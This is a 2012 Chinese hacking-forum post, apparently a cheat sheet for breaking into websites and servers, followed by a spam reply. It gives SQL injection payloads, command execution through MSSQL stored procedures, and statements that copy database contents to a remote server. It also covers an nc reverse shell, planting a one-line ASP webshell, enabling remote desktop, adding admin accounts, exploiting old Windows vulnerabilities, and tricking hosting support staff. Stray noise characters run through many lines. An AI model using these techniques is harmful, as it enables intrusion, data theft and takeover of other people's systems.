找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3145|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
+ I" y7 B. }; k: E+ n! u9 g! w+ M6 i- |4 Z

* y* L; F9 S- L' C, [9 g# t! q6 b  HSA点数据库分离搞法+语句:
) {* `% r; M/ D: ^
) E9 J( {# u& O# o% y" [  e注射点不显错,执行下面三条语句页面都返回正常。
  o! g5 P  T  h3 z: \and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')  q9 R: @6 G( E4 s% l
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
9 D6 C2 g0 l5 Z/ A" c3 |and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
, P! m) U+ \8 ?; Z9 v可以列目录,判断系统为2000,web与数据库分离
& a4 Y1 x, d  b, g( g遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
' P) d' q: n. j) l! r' c% w在注射点上执行! J7 g3 f6 ]( ~1 y2 d. v
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
: s0 C0 c  s5 Z+ l  \页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
9 `: _$ Y% J% Q0 n2 P; ?, [0 T2 k% W还有我用NC监听得其他端口都没有得到IP。$ Q- h( x; g8 P7 X* V: C

( {9 z  ^: _1 O- I4 X通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。2 k' s- I+ L" @& c1 h: l3 |, q# F
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--0 j5 D" f! Z. v

5 I' a' ?7 C9 w+ \. T;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
# t8 s- F& [. \4 ^/ m2 Z
3 e. t; f; C5 g+ ?" v; G现在就猜想是不是数据库是内网而且不能连外网。
; J/ d2 Z7 n/ b& k6 x6 O# r1 F" o. }+ {: D' Q/ ?
2 p/ ?% v! d0 ^+ t2 V$ T
access导出txt文本代码- P! I3 S- ~. {& S4 J2 m% R( ]
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
' k# y' M$ L# Q, k: ~
; b4 O' J' k& R0 n! F3 g5 [, G  @& B$ a9 h/ Q6 T
6 V5 V0 p& D+ S7 C# ~3 c$ u0 O
自动跳转到指定网站代码头
: {' m* `2 A: e- i<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
& V9 E% `! d, O/ D' V2 Y- U% N" H/ B8 A7 ^

! G, @5 a  R3 u, H, @6 c入侵java or jsp站点时默认配置文件路径:
5 `: [1 i) ~! _$ Z\web-inf\web.xml
: ?7 p: B/ x2 Ktomcat下的配置文件位置:! K4 a0 r; j! J. ]3 Z- w
\conf\server.xml            (前面加上tomcat路径)
- q5 D! k, L' ?+ Q8 I* w9 ^\Tomcat 5.0\webapps\root\web-inf\struts-config.xml8 d+ [* y6 U. O& ~
0 |% w- H+ x3 y3 y

5 {0 R) t% U. o5 Y1 n* f% C# J
, M6 T) D8 ^% U! j2 N检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
. Z  J) Z5 z3 Z6 d+ s-1%234 Z  R7 w3 X. U
>
; l+ C* q$ h; X7 x+ d5 Z8 R<0 B8 D1 V0 K$ b: d2 x
1'+or+'1'='1
+ l- n" Z& E9 N2 wid=8%bf0 ^- z8 M* o* Y0 Y1 H' k( }

# L3 @% Q  ?+ K! _  B9 G/ l全新注入点检测试法:
8 K* V+ j6 a) ]* |) u9 p  Z在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。8 m5 p' Y5 K) O
$ \* v9 q# y5 O7 ]: l
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
& y/ \, u: A% i% k' o# _1 C  q# J
搜索型注入判断方法:
9 O- s; O, \& E# m1 i  J3 S7 z& j) A2 u北京%' and '1'='1' and '%'='
- A9 W3 v6 [; ^& R5 Q: p北京%' and '1'='2' and '%'='
8 I, M: p' r! R, }
9 D0 Y# Y9 S! b4 g& O. y( N! I7 p) _; @8 b  S% ?% L% W' _3 T
COOKIES注入:6 U5 _, R9 j0 v

+ v, V+ T9 O8 T6 Z' E# Wjavascript:alert(document.cookie="id="+escape("51 and 1=1"));2 M6 _# W5 o$ U; l0 v5 f$ A: e

& Q* P! v2 ?! V. p2000专业版查看本地登录用户命令:
' n7 J$ {. E2 S0 }- Mnet config workstation
% L! Z0 p0 u" @" r2 R+ @9 Z" W5 @2 p1 `7 b2 G
4 I5 A/ q4 W, t& b5 }
2003下查看ipsec配置和默认防火墙配置命令:
5 G+ C! n" ]8 B" ~7 a4 vnetsh firewall show config
8 ~0 _$ I' N6 I5 K" I% t; qnetsh ipsec static show all
) x6 u7 n8 `% }, r1 O- W
' ^! i3 X1 g  l% ]& H% ~; I; j' u不指派指定策略命令:
( a6 q) M! G$ q( Q  n9 }netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
' B' J3 V$ W2 m: ]netsh ipsec static show policy all  显示策略名* D* Y# s; n0 |5 m, n( n
, d1 U8 N9 Q5 `

/ i# T% N# J5 s猜管理员后台小技巧:( |$ J0 R3 c) v  s$ H
admin/left.asp % n, h8 b- a. m
admin/main.asp: Q; A% \! H: U2 U. I' [
admin/top.asp
  w( B( q" [' ^& U1 y; yadmin/admin.asp + ^$ x( l4 ~9 z! G
会现出菜单导航,然后迅雷下载全部链接4 h, p4 \$ N+ N. T4 U' E

: S9 E0 U; k- D+ O. h% `3 e# O, m/ i8 z; ]
社会工程学:  d8 Y" l( @2 e8 x3 W2 y
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人* Y% ^" X) w4 N+ f& ^
然后去骗客服% j2 t! N. I# N# p7 |: K
* q; t  n) D& Y, k  x
; Q- \5 b4 {/ y: [& M5 w) M! j
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
$ j7 }, ]) D" G! ?7 R查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, , t& H4 c. b" I; r1 ]3 J
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
* e2 y. k7 X  `  n% X: Z+ _7 a" k/ B, c6 X7 W
# E9 C! E% f* S; [7 a/ b

% M/ j  d! G! h, H6 @6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)( v- U1 S( t0 Q  ~
+ J! H: y1 _( K

$ z, T- d3 g. _% W7 D5 ~: X5 |% c* D
CMD加密注册表位置1 [+ T( @; w0 r8 j
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" g% \: k$ m  V) }3 r) N
AutoRun
( Y' o$ z( F/ l. U. _* l3 W0 I  a, R& x2 ]8 F
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor+ n' B3 B' i- A0 M0 a
AutoRun8 E% `+ Z* }7 f
! g) L6 \5 c' i! _0 F# Y
& v" \3 ]$ G  K: a- }
在找注入时搜索Hidden,把他改成test
" `& P0 B! v9 T$ B$ }4 W3 A5 H; a8 Z4 C+ b% C9 K; R

+ q; [4 q, Q- q1 M5 d8 g* c8 z  `9 O
mstsc /v:IP /console
) X$ c! w% p! w5 O7 S% Z* @! y! h2 _/ ~6 }, Y1 |. G1 g
; b3 Q) m) g6 w; M: R1 |  U3 s7 D5 {
一句话开3389:" w/ V7 V( d+ D" U7 V- p

- C( x% y# x) k; E2 s  d; k7 ]最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  5 b1 ]; p! W7 N7 `0 z6 |5 X$ y
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.8 X7 \8 t4 w9 X0 B& V7 b6 U9 T

$ f3 g8 y5 K  q% e
7 Q# u& l# z0 A1 a知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:" m' v, y5 e. k+ }
Insert into admin(user,pwd) values('test','test')
% |7 l, z3 L% c* Z& @( @6 q+ R7 [1 q; T' Z

0 N' Z7 v6 B$ D/ SNC反弹+ z. }/ B2 {1 G6 W$ t3 Y
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   7 J$ @% p' n, `2 N
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
) d- M/ z% ?+ j, P7 I: X
7 o' T8 ?8 T- w, i
- p8 [$ X0 c" g) f2 d在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
2 @! f! w6 F0 C1 G$ ?; E% v# P6 z2 t9 K; I4 J* G! k
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录% ^- y- F7 S" o- E3 W
例如:
; \- `. B/ S, c# hsubst k: d:\www\ 用d盘www目录替代k盘8 z( l4 d/ g1 v; L4 [6 L2 Z
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表